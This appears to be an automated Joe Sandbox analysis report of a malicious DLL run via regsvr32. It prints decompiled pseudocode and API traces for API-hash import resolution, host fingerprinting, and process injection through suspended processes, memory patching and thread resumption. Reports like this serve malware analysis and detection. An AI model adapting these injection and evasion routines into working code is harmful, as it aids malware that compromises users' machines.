Associated: 00000008.00000002.646389051.000000006CB18000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.646394043.000000006CB1D000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.646397499.000000006CB1F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6cb00000_regsvr32.jbxd

Similarity

API ID: File$CreateErrorLastModuleTime$AttributesByteCharDebugHandleHeapMultiNameOutputStringSystemThreadUnothrow_t@std@@@Wide__ehfuncinfo$??2@memset
String ID: Hello qqq
API String ID: 3435743081-3610097158
Opcode ID: 673c5b48ee5c8e5fd8ced3899d65dc52bc73ab54a19ef682feb004aa3952f7ce
Instruction ID: 16dabe9f1b3c0f129194ff2d8d704cc1d2c867643f2357df0cc54c0917469a6f
Opcode Fuzzy Hash: 673c5b48ee5c8e5fd8ced3899d65dc52bc73ab54a19ef682feb004aa3952f7ce
Instruction Fuzzy Hash: BB31A8B1B40184AFDF149B61D84DE9E3FBCEF42714F10855AE855D7E80EB348A88CB62

Uniqueness

Uniqueness Score: -1.00%

Function 6CC08D44, Relevance: 13.8, APIs: 9, Instructions: 318
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNEL32(00000000,00000888,00003000,00000040,00000888,6CC08790), ref: 6CC08E01
VirtualAlloc.KERNEL32(00000000,0000016F,00003000,00000040,6CC087F6), ref: 6CC08E38
VirtualAlloc.KERNEL32(00000000,00022F48,00003000,00000040), ref: 6CC08E98
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 6CC08ECE
VirtualProtect.KERNEL32(6CB00000,00000000,00000004,6CC08D23), ref: 6CC08FD3
VirtualProtect.KERNEL32(6CB00000,00001000,00000004,6CC08D23), ref: 6CC08FFA
VirtualProtect.KERNEL32(00000000,?,00000002,6CC08D23), ref: 6CC090C7
VirtualProtect.KERNEL32(00000000,?,00000002,6CC08D23,?), ref: 6CC0911D
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 6CC09139

Memory Dump Source

Source File: 00000008.00000002.646502371.000000006CC08000.00000040.00020000.sdmp, Offset: 6CC08000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6cc08000_regsvr32.jbxd

Similarity

API ID: Virtual$Protect$Alloc$Free
String ID:
API String ID: 2574235972-0
Opcode ID: 00ab6cab5128f1b70d3fc146b5e93990a19c913ce9501952dd03dc86e75d55b8
Instruction ID: 70efaa665b8edb30936c39bfc55cae7a89093142218af3d041b795f58bd5dc2e
Opcode Fuzzy Hash: 00ab6cab5128f1b70d3fc146b5e93990a19c913ce9501952dd03dc86e75d55b8
Instruction Fuzzy Hash: BAD16C72600200DFDB15CF94C888F9277A6FF48714B294195ED89AFB5AE7B1AC01CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 6CB0CBB9, Relevance: 7.6, APIs: 5, Instructions: 105
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 93%

			E6CB0CBB9(void* __ecx, void** __edx, void* __eflags, intOrPtr _a4) {
				long _v8;
				long _v12;
				void* _v16;
				intOrPtr _v23;
				void _v24;
				long _v28;
				void* _v568;
				void _v744;
				void* __ebx;
				void* __edi;
				void* __esi;
				struct HINSTANCE__* _t32;
				intOrPtr _t33;
				intOrPtr _t35;
				void* _t39;
				intOrPtr _t43;
				void* _t63;
				long _t65;
				void* _t70;
				void** _t73;
				void* _t74;

				_t73 = __edx;
				_t63 = __ecx;
				_t74 = 0;
				if(E6CB0C510(__ecx, __edx, __edx, 0) != 0) {
					_t39 = E6CB0C702( *((intOrPtr*)(__edx)), _a4); // executed
					_t74 = _t39;
					if(_t74 != 0) {
						memset( &_v744, 0, 0x2cc);
						_v744 = 0x10002;
						_push( &_v744);
						_t43 =  *0x6cb1e684; // 0xdbfaa0
						_push(_t73[1]);
						if( *((intOrPtr*)(_t43 + 0xa8))() != 0) {
							_t70 = _v568;
							_v12 = _v12 & 0x00000000;
							_v24 = 0xe9;
							_t65 = 5;
							_v23 = _t74 - _t70 - _a4 + _t63 + 0xfffffffb;
							_v8 = _t65;
							_v16 = _t70;
							if(NtProtectVirtualMemory( *_t73,  &_v16,  &_v8, 4,  &_v12) < 0 || NtWriteVirtualMemory( *_t73, _v568,  &_v24, _t65,  &_v8) < 0) {
								L6:
								_t74 = 0;
							} else {
								_v28 = _v28 & 0x00000000;
								if(NtProtectVirtualMemory( *_t73,  &_v16,  &_v8, _v12,  &_v28) < 0) {
									goto L6;
								}
							}
						}
					}
				}
				_t32 =  *0x6cb1e77c; // 0x0
				if(_t32 != 0) {
					FreeLibrary(_t32);
					 *0x6cb1e77c =  *0x6cb1e77c & 0x00000000;
				}
				_t33 =  *0x6cb1e784; // 0x0
				if(_t33 != 0) {
					_t35 =  *0x6cb1e684; // 0xdbfaa0
					 *((intOrPtr*)(_t35 + 0x10c))(_t33);
					E6CB085FB(0x6cb1e784, 0xfffffffe);
				}
				return _t74;
			}

0x6cb0cbc5
0x6cb0cbc7
0x6cb0cbc9
0x6cb0cbd2
0x6cb0cbdd
0x6cb0cbe2
0x6cb0cbe6
0x6cb0cbfa
0x6cb0cc02
0x6cb0cc12
0x6cb0cc13
0x6cb0cc18
0x6cb0cc23
0x6cb0cc29
0x6cb0cc31
0x6cb0cc3f
0x6cb0cc45
0x6cb0cc46
0x6cb0cc52
0x6cb0cc59
0x6cb0cc69
0x6cb0cca9
0x6cb0cca9
0x6cb0cc88
0x6cb0cc88
0x6cb0cca7
0x00000000
0x00000000
0x6cb0cca7
0x6cb0cc69
0x6cb0cc23
0x6cb0cbe6
0x6cb0ccab
0x6cb0ccb2
0x6cb0ccb5
0x6cb0ccbb
0x6cb0ccbb
0x6cb0ccc2
0x6cb0ccc9
0x6cb0cccc
0x6cb0ccd1
0x6cb0ccde
0x6cb0cce4
0x6cb0cceb

APIs

Part of subcall function 6CB0C510: LoadLibraryW.KERNEL32 ref: 6CB0C608
Part of subcall function 6CB0C510: memset.MSVCRT ref: 6CB0C647

FreeLibrary.KERNEL32(00000000,?,00000000,00000000), ref: 6CB0CCB5

Part of subcall function 6CB0C702: NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000,6CB05CCD), ref: 6CB0C775
Part of subcall function 6CB0C702: RegisterClassExA.USER32 ref: 6CB0C7C7
Part of subcall function 6CB0C702: CreateWindowExA.USER32 ref: 6CB0C7F2
Part of subcall function 6CB0C702: DestroyWindow.USER32 ref: 6CB0C7FD
Part of subcall function 6CB0C702: UnregisterClassA.USER32(?,00000000), ref: 6CB0C808

memset.MSVCRT ref: 6CB0CBFA
NtProtectVirtualMemory.NTDLL(?,?,?,00000004,00000000), ref: 6CB0CC64
NtWriteVirtualMemory.NTDLL(?,?,000000E9,00000005,?), ref: 6CB0CC81
NtProtectVirtualMemory.NTDLL(?,?,?,00000000,00000000), ref: 6CB0CCA2

Memory Dump Source

Source File: 00000008.00000002.646378141.000000006CB01000.00000020.00020000.sdmp, Offset: 6CB00000, based on PE: true

Associated: 00000008.00000002.646374139.000000006CB00000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.646389051.000000006CB18000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.646394043.000000006CB1D000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.646397499.000000006CB1F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6cb00000_regsvr32.jbxd

Similarity

API ID: MemoryVirtual$ClassCreateLibraryProtectWindowmemset$DestroyFreeLoadRegisterSectionUnregisterWrite
String ID:
API String ID: 317994034-0
Opcode ID: d2961eeaa86e1a1ec4a66ba8c9f79782df9a350439541500e14af61cf6cc5d28
Instruction ID: 223fb31f9f843a7fc3dc52aa6ab006f5783b3eee3495888a08ae924b77b3b2f9
Opcode Fuzzy Hash: d2961eeaa86e1a1ec4a66ba8c9f79782df9a350439541500e14af61cf6cc5d28
Instruction Fuzzy Hash: 7C314F76B00149AFEB11DFA8CD49FDEBBBCEB18214F2001A5E515D7650E730DA44CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 6CB0ABE5, Relevance: 7.6, APIs: 5, Instructions: 65
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E6CB0ABE5(intOrPtr __ecx, void* __edx) {
				void* _v304;
				void* _v308;
				signed int _t14;
				signed int _t15;
				void* _t22;
				intOrPtr _t28;
				void* _t31;
				intOrPtr _t33;
				void* _t40;
				void* _t42;

				_t33 = __ecx;
				_t31 = __edx; // executed
				_t14 = CreateToolhelp32Snapshot(2, 0);
				_t42 = _t14;
				_t15 = _t14 | 0xffffffff;
				if(_t42 != _t15) {
					memset( &_v304, 0, 0x128);
					_v304 = 0x128;
					if(Process32First(_t42,  &_v304) != 0) {
						while(1) {
							_t22 = E6CB0CD02(_t33,  &_v308, _t31); // executed
							_t40 = _t22;
							if(_t40 == 0) {
								break;
							}
							_t33 =  *0x6cb1e684; // 0xdbfaa0
							if(Process32Next(_t42,  &_v308) != 0) {
								continue;
							}
							break;
						}
						CloseHandle(_t42);
						_t15 = 0 | _t40 == 0x00000000;
					} else {
						_t28 =  *0x6cb1e684; // 0xdbfaa0
						 *((intOrPtr*)(_t28 + 0x30))(_t42);
						_t15 = 0xfffffffe;
					}
				}
				return _t15;
			}

0x6cb0abe5
0x6cb0abfd
0x6cb0abff
0x6cb0ac02
0x6cb0ac04
0x6cb0ac09
0x6cb0ac18
0x6cb0ac20
0x6cb0ac34
0x6cb0ac44
0x6cb0ac4a
0x6cb0ac4f
0x6cb0ac55
0x00000000
0x00000000
0x6cb0ac57
0x6cb0ac68
0x00000000
0x00000000
0x00000000
0x6cb0ac68
0x6cb0ac70
0x6cb0ac77
0x6cb0ac36
0x6cb0ac36
0x6cb0ac3c
0x6cb0ac41
0x6cb0ac41
0x6cb0ac34
0x6cb0ac80

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000011,?,00000010), ref: 6CB0ABFF
memset.MSVCRT ref: 6CB0AC18
Process32First.KERNEL32(00000000,?), ref: 6CB0AC2F
Process32Next.KERNEL32(00000000,?), ref: 6CB0AC63
CloseHandle.KERNEL32(00000000), ref: 6CB0AC70

Memory Dump Source

Source File: 00000008.00000002.646378141.000000006CB01000.00000020.00020000.sdmp, Offset: 6CB00000, based on PE: true

Associated: 00000008.00000002.646374139.000000006CB00000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.646389051.000000006CB18000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.646394043.000000006CB1D000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.646397499.000000006CB1F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6cb00000_regsvr32.jbxd

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32memset
String ID:
API String ID: 1267121359-0
Opcode ID: ea0adfb692ae96f273a986995c3a794522ffbb1322e5eb19d3203b6fa3e7932a
Instruction ID: 1c864ac74bcdfe634309d7ffeec3449c70c9dd354042ebd0c2595a44590cd832
Opcode Fuzzy Hash: ea0adfb692ae96f273a986995c3a794522ffbb1322e5eb19d3203b6fa3e7932a
Instruction Fuzzy Hash: 9B1194723043856BD710DA68DD4DF9F3BACEB86764F660A19F520C7980EB24D805C7A6

Uniqueness

Uniqueness Score: -1.00%

Function 6CB0DFEF, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E6CB0DFEF(void* __ecx, intOrPtr __edx) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v92;
				intOrPtr _t41;
				signed int _t47;
				signed int _t49;
				signed int _t51;
				void* _t56;
				struct HINSTANCE__* _t58;
				_Unknown_base(*)()* _t59;
				intOrPtr _t60;
				void* _t62;
				intOrPtr _t63;
				void* _t69;
				char _t70;
				void* _t75;
				CHAR* _t80;
				void* _t82;

				_t75 = __ecx;
				_v12 = __edx;
				_t60 =  *((intOrPtr*)(__ecx + 0x3c));
				_t41 =  *((intOrPtr*)(_t60 + __ecx + 0x78));
				if(_t41 == 0) {
					L4:
					return 0;
				}
				_t62 = _t41 + __ecx;
				_v24 =  *((intOrPtr*)(_t62 + 0x24)) + __ecx;
				_t73 =  *((intOrPtr*)(_t62 + 0x20)) + __ecx;
				_t63 =  *((intOrPtr*)(_t62 + 0x18));
				_v28 =  *((intOrPtr*)(_t62 + 0x1c)) + __ecx;
				_t47 = 0;
				_v20 =  *((intOrPtr*)(_t62 + 0x20)) + __ecx;
				_v8 = 0;
				_v16 = _t63;
				if(_t63 == 0) {
					goto L4;
				} else {
					goto L2;
				}
				while(1) {
					L2:
					_t49 = E6CB0D442( *((intOrPtr*)(_t73 + _t47 * 4)) + _t75, E6CB0C3BB( *((intOrPtr*)(_t73 + _t47 * 4)) + _t75), 0);
					_t51 = _v8;
					if((_t49 ^ 0x218fe95b) == _v12) {
						break;
					}
					_t73 = _v20;
					_t47 = _t51 + 1;
					_v8 = _t47;
					if(_t47 < _v16) {
						continue;
					}
					goto L4;
				}
				_t69 =  *((intOrPtr*)(_t60 + _t75 + 0x78)) + _t75;
				_t80 =  *((intOrPtr*)(_v28 + ( *(_v24 + _t51 * 2) & 0x0000ffff) * 4)) + _t75;
				if(_t80 < _t69 || _t80 >=  *((intOrPtr*)(_t60 + _t75 + 0x7c)) + _t69) {
					return _t80;
				} else {
					_t56 = 0;
					while(1) {
						_t70 = _t80[_t56];
						if(_t70 == 0x2e || _t70 == 0) {
							break;
						}
						 *((char*)(_t82 + _t56 - 0x58)) = _t70;
						_t56 = _t56 + 1;
						if(_t56 < 0x40) {
							continue;
						}
						break;
					}
					 *((intOrPtr*)(_t82 + _t56 - 0x58)) = 0x6c6c642e;
					 *((char*)(_t82 + _t56 - 0x54)) = 0;
					if( *((char*)(_t56 + _t80)) != 0) {
						_t80 =  &(( &(_t80[1]))[_t56]);
					}
					_t40 =  &_v92; // 0x6c6c642e
					_t58 = LoadLibraryA(_t40); // executed
					if(_t58 == 0) {
						goto L4;
					}
					_t59 = GetProcAddress(_t58, _t80);
					if(_t59 == 0) {
						goto L4;
					}
					return _t59;
				}
			}

0x6cb0dff8
0x6cb0dffa
0x6cb0dffd
0x6cb0e000
0x6cb0e006
0x6cb0e063
0x00000000
0x6cb0e063
0x6cb0e008
0x6cb0e013
0x6cb0e016
0x6cb0e01b
0x6cb0e020
0x6cb0e023
0x6cb0e025
0x6cb0e028
0x6cb0e02b
0x6cb0e030
0x00000000
0x00000000
0x00000000
0x00000000
0x6cb0e032
0x6cb0e032
0x6cb0e044
0x6cb0e051
0x6cb0e055
0x00000000
0x00000000
0x6cb0e057
0x6cb0e05a
0x6cb0e05b
0x6cb0e061
0x00000000
0x00000000
0x00000000
0x6cb0e061
0x6cb0e078
0x6cb0e07d
0x6cb0e081
0x00000000
0x6cb0e08d
0x6cb0e08d
0x6cb0e08f
0x6cb0e08f
0x6cb0e095
0x00000000
0x00000000
0x6cb0e09b
0x6cb0e09f
0x6cb0e0a3
0x00000000
0x00000000
0x00000000
0x6cb0e0a3
0x6cb0e0a9
0x6cb0e0b1
0x6cb0e0b6
0x6cb0e0b9
0x6cb0e0b9
0x6cb0e0bb
0x6cb0e0bf
0x6cb0e0c7
0x00000000
0x00000000
0x6cb0e0cb
0x6cb0e0d3
0x00000000
0x00000000
0x00000000
0x6cb0e0d3

APIs

LoadLibraryA.KERNEL32(.dll), ref: 6CB0E0BF
GetProcAddress.KERNEL32(00000000,8DF08B59), ref: 6CB0E0CB

Strings

.dll, xrefs: 6CB0E0BB, 6CB0E0BE

Memory Dump Source

Source File: 00000008.00000002.646378141.000000006CB01000.00000020.00020000.sdmp, Offset: 6CB00000, based on PE: true

Associated: 00000008.00000002.646374139.000000006CB00000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.646389051.000000006CB18000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.646394043.000000006CB1D000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.646397499.000000006CB1F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6cb00000_regsvr32.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: .dll
API String ID: 2574300362-2738580789
Opcode ID: f02e23655aad15225db2cf7b22146fddfbb34ea70477d073eedecbbc9ee0381b
Instruction ID: bae6e8ab3d69d1aaf615ade7f5b04a42c4125dd9c14124d74a18cd24eea3d933
Opcode Fuzzy Hash: f02e23655aad15225db2cf7b22146fddfbb34ea70477d073eedecbbc9ee0381b
Instruction Fuzzy Hash: B9319C31B011D99FDB14CFA9C881BAEBBE9AF44308F24046AD895E7A41EB31D9418BD1

Uniqueness

Uniqueness Score: -1.00%

Function 6CB41320, Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 200
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtectEx.KERNEL32(000000FF,6CC0878C,RQ@,00000040,?), ref: 6CB41518
GetWindowsDirectoryW.KERNEL32(6CC07810,0000086F), ref: 6CB415E0

Strings

RQ@, xrefs: 6CB4150C, 6CB4150F
', xrefs: 6CB4132E
@, xrefs: 6CB4133C
1, xrefs: 6CB41327

Memory Dump Source

Source File: 00000008.00000002.646401373.000000006CB21000.00000020.00020000.sdmp, Offset: 6CB21000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6cb21000_regsvr32.jbxd

Similarity

API ID: DirectoryProtectVirtualWindows
String ID: '$1$@$RQ@
API String ID: 2764058431-577489365
Opcode ID: 2d7dc5e83e32a8d808fd15f761b272a02e2e951a6a806ddbb19bdbf8fc7fa8a2
Instruction ID: 576e199af8bc79edcab7f51293370d413fbeea0332d757603724047aae0f78b4
Opcode Fuzzy Hash: 2d7dc5e83e32a8d808fd15f761b272a02e2e951a6a806ddbb19bdbf8fc7fa8a2
Instruction Fuzzy Hash: 80A13D74B04549DFCB08DF69C290AACBBF5FB85308F1582AED8059B386D335AB85DB11

Uniqueness

Uniqueness Score: -1.00%

Function 6CB0B7EA, Relevance: 9.1, APIs: 6, Instructions: 83
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 94%

			E6CB0B7EA(WCHAR* __ecx, void* __edx) {
				long _v8;
				long _v12;
				WCHAR* _v16;
				short _v528;
				short _v1040;
				short _v1552;
				WCHAR* _t27;
				signed int _t29;
				void* _t33;
				long _t38;
				WCHAR* _t43;
				WCHAR* _t56;

				_t44 = __ecx;
				_v8 = _v8 & 0x00000000;
				_t43 = __edx;
				_t56 = __ecx;
				memset(__edx, 0, 0x100);
				_v12 = 0x100;
				GetComputerNameW( &_v528,  &_v12);
				lstrcpynW(_t43,  &_v528, 0x100);
				_t27 = E6CB095C2(_t44, 0xa88);
				_v16 = _t27;
				_t29 = GetVolumeInformationW(_t27,  &_v1552, 0x100,  &_v8, 0, 0,  &_v1040, 0x100);
				asm("sbb eax, eax");
				_v8 = _v8 &  ~_t29;
				E6CB085B6( &_v16);
				_t33 = E6CB0C3D4(_t43);
				E6CB09621( &(_t43[E6CB0C3D4(_t43)]), 0x100 - _t33, L"%u", _v8);
				lstrcatW(_t43, _t56);
				_t38 = E6CB0C3D4(_t43);
				_v12 = _t38;
				CharUpperBuffW(_t43, _t38);
				return E6CB0D442(_t43, E6CB0C3D4(_t43) + _t40, 0);
			}

0x6cb0b7ea
0x6cb0b7f3
0x6cb0b7ff
0x6cb0b805
0x6cb0b807
0x6cb0b80f
0x6cb0b822
0x6cb0b831
0x6cb0b83c
0x6cb0b849
0x6cb0b863
0x6cb0b868
0x6cb0b86a
0x6cb0b871
0x6cb0b881
0x6cb0b892
0x6cb0b89c
0x6cb0b8a4
0x6cb0b8ab
0x6cb0b8ae
0x6cb0b8cb

APIs

memset.MSVCRT ref: 6CB0B807
GetComputerNameW.KERNEL32(?,?,74EC17D9,00000000,74EC11C0), ref: 6CB0B822
lstrcpynW.KERNEL32(?,?,00000100), ref: 6CB0B831
GetVolumeInformationW.KERNEL32(00000000,?,00000100,00000000,00000000,00000000,?,00000100), ref: 6CB0B863

Part of subcall function 6CB09621: _vsnwprintf.MSVCRT ref: 6CB0963E

lstrcatW.KERNEL32 ref: 6CB0B89C
CharUpperBuffW.USER32(?,00000000), ref: 6CB0B8AE

Memory Dump Source

Source File: 00000008.00000002.646378141.000000006CB01000.00000020.00020000.sdmp, Offset: 6CB00000, based on PE: true

Associated: 00000008.00000002.646374139.000000006CB00000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.646389051.000000006CB18000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.646394043.000000006CB1D000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.646397499.000000006CB1F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6cb00000_regsvr32.jbxd

Similarity

API ID: BuffCharComputerInformationNameUpperVolume_vsnwprintflstrcatlstrcpynmemset
String ID:
API String ID: 3410906232-0
Opcode ID: 29a6e1beb16477f15cd775082474482134cd1aa681f4c529553633793aa94e15
Instruction ID: f33b3657340d61aaed2caa975dda6bb6097eb080ae21067c20f6a4d8d9ff667f
Opcode Fuzzy Hash: 29a6e1beb16477f15cd775082474482134cd1aa681f4c529553633793aa94e15
Instruction Fuzzy Hash: 4F2171B2B00218BFDB109BA4DC8AFEF7BBCEB45214F104169F505D3681EB759E488B61

Uniqueness

Uniqueness Score: -1.00%

Function 6CB0CA67, Relevance: 4.6, APIs: 3, Instructions: 120
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 89%

			E6CB0CA67(intOrPtr __edx) {
				signed int _v8;
				intOrPtr _v12;
				signed int _v16;
				intOrPtr _v20;
				char _v24;
				void* _v36;
				char _v40;
				char _v80;
				char _t37;
				intOrPtr _t38;
				void* _t45;
				intOrPtr _t47;
				intOrPtr _t48;
				intOrPtr _t50;
				intOrPtr _t52;
				void* _t54;
				intOrPtr _t57;
				long _t61;
				intOrPtr _t62;
				signed int _t65;
				signed int _t68;
				signed int _t82;
				void* _t85;
				char _t86;

				_v8 = _v8 & 0x00000000;
				_v20 = __edx;
				_t65 = 0;
				_t37 = E6CB0C93F( &_v8);
				_t86 = _t37;
				_v24 = _t86;
				_t87 = _t86;
				if(_t86 == 0) {
					return _t37;
				}
				_t38 =  *0x6cb1e688; // 0xd40590
				_t7 = _t38 + 0xac; // 0xc1586879
				E6CB0A8AF( &_v80,  *_t7 + 7, _t87);
				_t82 = _v8;
				_t68 = 0;
				_v16 = 0;
				if(_t82 == 0) {
					L20:
					E6CB085FB( &_v24, 0);
					return _t65;
				}
				while(_t65 == 0) {
					while(_t65 == 0) {
						asm("stosd");
						asm("stosd");
						asm("stosd");
						asm("stosd");
						_t45 = E6CB0AEA8( *((intOrPtr*)(_t86 + _t68 * 4)),  &_v40); // executed
						_t92 = _t45;
						if(_t45 >= 0) {
							_t54 = E6CB0CBB9(E6CB05CCD,  &_v40, _t92, _v20); // executed
							if(_t54 != 0) {
								_t57 =  *0x6cb1e684; // 0xdbfaa0
								_t85 =  *((intOrPtr*)(_t57 + 0xc4))(0, 0, 0,  &_v80);
								if(_t85 != 0) {
									GetLastError();
									_t61 = ResumeThread(_v36);
									_t62 =  *0x6cb1e684; // 0xdbfaa0
									if(_t61 != 0) {
										_push(0xea60);
										_push(_t85);
										if( *((intOrPtr*)(_t62 + 0x2c))() == 0) {
											_t65 = _t65 + 1;
										}
										_t62 =  *0x6cb1e684; // 0xdbfaa0
									}
									CloseHandle(_t85);
								}
							}
						}
						if(_v40 != 0) {
							if(_t65 == 0) {
								_t52 =  *0x6cb1e684; // 0xdbfaa0
								 *((intOrPtr*)(_t52 + 0x104))(_v40, _t65);
							}
							_t48 =  *0x6cb1e684; // 0xdbfaa0
							 *((intOrPtr*)(_t48 + 0x30))(_v36);
							_t50 =  *0x6cb1e684; // 0xdbfaa0
							 *((intOrPtr*)(_t50 + 0x30))(_v40);
						}
						_t68 = _v16;
						_t47 = _v12 + 1;
						_v12 = _t47;
						if(_t47 < 2) {
							continue;
						} else {
							break;
						}
					}
					_t82 = _v8;
					_t68 = _t68 + 1;
					_v16 = _t68;
					if(_t68 < _t82) {
						continue;
					} else {
						break;
					}
					do {
						goto L19;
					} while (_t82 != 0);
					goto L20;
				}
				L19:
				E6CB085FB(_t86, 0xfffffffe);
				_t86 = _t86 + 4;
				_t82 = _t82 - 1;
			}

0x6cb0ca6d
0x6cb0ca76
0x6cb0ca79
0x6cb0ca7b
0x6cb0ca80
0x6cb0ca82
0x6cb0ca85
0x6cb0ca87
0x6cb0cbb8
0x6cb0cbb8
0x6cb0ca8d
0x6cb0ca96
0x6cb0ca9f
0x6cb0caa4
0x6cb0caa7
0x6cb0caa9
0x6cb0caae
0x6cb0cba5
0x6cb0cbab
0x00000000
0x6cb0cbb4
0x6cb0cab4
0x6cb0cabf
0x6cb0cacc
0x6cb0cad0
0x6cb0cad1
0x6cb0cad2
0x6cb0cad6
0x6cb0cadb
0x6cb0cadd
0x6cb0caea
0x6cb0caf2
0x6cb0cafd
0x6cb0cb08
0x6cb0cb0c
0x6cb0cb0e
0x6cb0cb1c
0x6cb0cb24
0x6cb0cb29
0x6cb0cb2b
0x6cb0cb30
0x6cb0cb36
0x6cb0cb38
0x6cb0cb38
0x6cb0cb39
0x6cb0cb39
0x6cb0cb3f
0x6cb0cb3f
0x6cb0cb0c
0x6cb0caf2
0x6cb0cb46
0x6cb0cb4a
0x6cb0cb4c
0x6cb0cb55
0x6cb0cb55
0x6cb0cb5b
0x6cb0cb63
0x6cb0cb66
0x6cb0cb6e
0x6cb0cb6e
0x6cb0cb74
0x6cb0cb77
0x6cb0cb78
0x6cb0cb7e
0x00000000
0x00000000
0x00000000
0x00000000
0x6cb0cb7e
0x6cb0cb84
0x6cb0cb87
0x6cb0cb88
0x6cb0cb8d
0x00000000
0x00000000
0x00000000
0x00000000
0x6cb0cb93
0x00000000
0x00000000
0x00000000
0x6cb0cb93
0x6cb0cb93
0x6cb0cb96
0x6cb0cb9c
0x6cb0cba0

APIs

Part of subcall function 6CB0AEA8: memset.MSVCRT ref: 6CB0AEC7
Part of subcall function 6CB0AEA8: CreateProcessW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,?,?,?,00000000,00000000), ref: 6CB0AEE7

Part of subcall function 6CB0CBB9: memset.MSVCRT ref: 6CB0CBFA
Part of subcall function 6CB0CBB9: NtProtectVirtualMemory.NTDLL(?,?,?,00000004,00000000), ref: 6CB0CC64
Part of subcall function 6CB0CBB9: NtWriteVirtualMemory.NTDLL(?,?,000000E9,00000005,?), ref: 6CB0CC81
Part of subcall function 6CB0CBB9: NtProtectVirtualMemory.NTDLL(?,?,?,00000000,00000000), ref: 6CB0CCA2
Part of subcall function 6CB0CBB9: FreeLibrary.KERNEL32(00000000,?,00000000,00000000), ref: 6CB0CCB5

GetLastError.KERNEL32(?,00000001), ref: 6CB0CB0E
ResumeThread.KERNEL32(?,?,00000001), ref: 6CB0CB1C
CloseHandle.KERNEL32(00000000,?,00000001), ref: 6CB0CB3F

Memory Dump Source

Source File: 00000008.00000002.646378141.000000006CB01000.00000020.00020000.sdmp, Offset: 6CB00000, based on PE: true

Associated: 00000008.00000002.646374139.000000006CB00000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.646389051.000000006CB18000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.646394043.000000006CB1D000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.646397499.000000006CB1F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6cb00000_regsvr32.jbxd

Similarity

API ID: MemoryVirtual$Protectmemset$CloseCreateErrorFreeHandleLastLibraryProcessResumeThreadWrite
String ID:
API String ID: 1274669455-0
Opcode ID: 47f11b47c1bfb53e233546a84602686b73fcd0196e1b4f32b19330fda81db99c
Instruction ID: 5e06aff1061f812d7e57f4d201758997f1cc72cd793aa2850927d05e9905d9c0
Opcode Fuzzy Hash: 47f11b47c1bfb53e233546a84602686b73fcd0196e1b4f32b19330fda81db99c
Instruction Fuzzy Hash: B6417F71B00649AFDB00EFE8C985EAD7BB9FF49314F2101A9E501A7A50DB309E05CB62

Uniqueness

Uniqueness Score: -1.00%

Function 6CB0B9DA, Relevance: 4.6, APIs: 3, Instructions: 54
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 86%

			E6CB0B9DA(union _TOKEN_INFORMATION_CLASS __edx, DWORD* _a4) {
				long _v8;
				void* _v12;
				void* _t12;
				void* _t20;
				void* _t22;
				union _TOKEN_INFORMATION_CLASS _t28;
				void* _t31;

				_push(_t22);
				_push(_t22);
				_t31 = 0;
				_t28 = __edx;
				_t20 = _t22;
				if(GetTokenInformation(_t20, __edx, 0, 0,  &_v8) != 0 || GetLastError() != 0x7a) {
					L6:
					_t12 = _t31;
				} else {
					_t31 = E6CB085E5(_v8);
					_v12 = _t31;
					if(_t31 != 0) {
						if(GetTokenInformation(_t20, _t28, _t31, _v8, _a4) != 0) {
							goto L6;
						} else {
							E6CB085FB( &_v12, _t16);
							goto L3;
						}
					} else {
						L3:
						_t12 = 0;
					}
				}
				return _t12;
			}

0x6cb0b9dd
0x6cb0b9de
0x6cb0b9e5
0x6cb0b9ed
0x6cb0b9f1
0x6cb0b9fa
0x6cb0ba40
